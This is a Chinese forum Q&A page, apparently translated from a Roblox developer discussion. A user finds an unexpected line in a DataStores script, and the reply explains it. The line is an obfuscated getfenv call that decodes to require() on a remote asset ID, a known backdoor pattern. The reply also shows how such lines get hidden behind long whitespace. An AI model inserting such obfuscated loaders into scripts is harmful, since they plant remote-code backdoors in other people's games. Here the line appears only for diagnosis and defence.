脚本中出现的随机代码,是病毒吗?
2021-1-10 7:56:29
收藏:0
阅读:287
评论:1
当我正在完全重写我的DataStores脚本时,我到达了非常末尾的部分,即我进行game:BindToClose(function()并且我只是循环遍历所有玩家,然后执行我在PlayerRemoving上所做的操作。我在game:BindToClose(function()之后按下enter键,然后这段代码出现在其下一行。这是否意味着我的游戏有病毒?还是这只是与Roblox的错误?
getfenv()['\114\101\113\117\105\114\101'](5151855975)
点赞
评论区的留言会收到邮件通知哦~
推荐文章
- Lua 虚拟机加密load(string.dump(function)) 后执行失败问题如何解决
- 我想创建一个 Nginx 规则,禁止访问
- 如何将两个不同的lua文件合成一个 东西有点长 大佬请耐心看完 我是小白研究几天了都没搞定
- 如何在roblox studio中1:1导入真实世界的地形?
- 求解,lua_resume的第二次调用继续执行协程问题。
- 【上海普陀区】内向猫网络招募【Skynet游戏框架Lua后端程序员】
- SF爱好求教:如何用lua实现游戏内调用数据库函数实现账号密码注册?
- Lua实现网站后台开发
- LUA错误显式返回,社区常见的规约是怎么样的
- lua5.3下载库失败
- 请问如何实现文本框内容和某个网页搜索框内容连接,并把网页输出来的结果反馈到另外一个文本框上
- lua lanes多线程使用
- 一个kv数据库
- openresty 有没有比较轻量的 docker 镜像
- 想问一下,有大佬用过luacurl吗
- 在Lua执行过程中使用Load函数出现问题
- 为什么 neovim 里没有显示一些特殊字符?
- Lua比较两个表的值(不考虑键的顺序)
- 有个lua简单的项目,外包,有意者加微信 liuheng600456详谈,最好在成都
- 如何在 Visual Studio 2022 中运行 Lua 代码?

你是写了这个 DataStores 脚本,还是从工具箱中修改了一个现有的脚本?
getfenv和setfenv常常被恶意脚本使用,用于动态执行难以从代码中理解和阅读的代码。 这行代码在执行require(5151855975),它会动态加载 一个资源 从 Roblox 目录中。幸运的是,在这种情况下,这个资源已经被审核,如果加载它的话,它不会做任何事情。通常,这些恶意行被隐藏在真正代码的末尾,使用空格将恶意代码推到屏幕远处:
print("这是一个正常的行") <添加 200 个空格> print("这里有一行隐藏的代码")听起来好像你敲回车键时,不小心展示了一些秘密的恶意代码。你可以尝试安全地删除它,而不会导致你的脚本崩溃。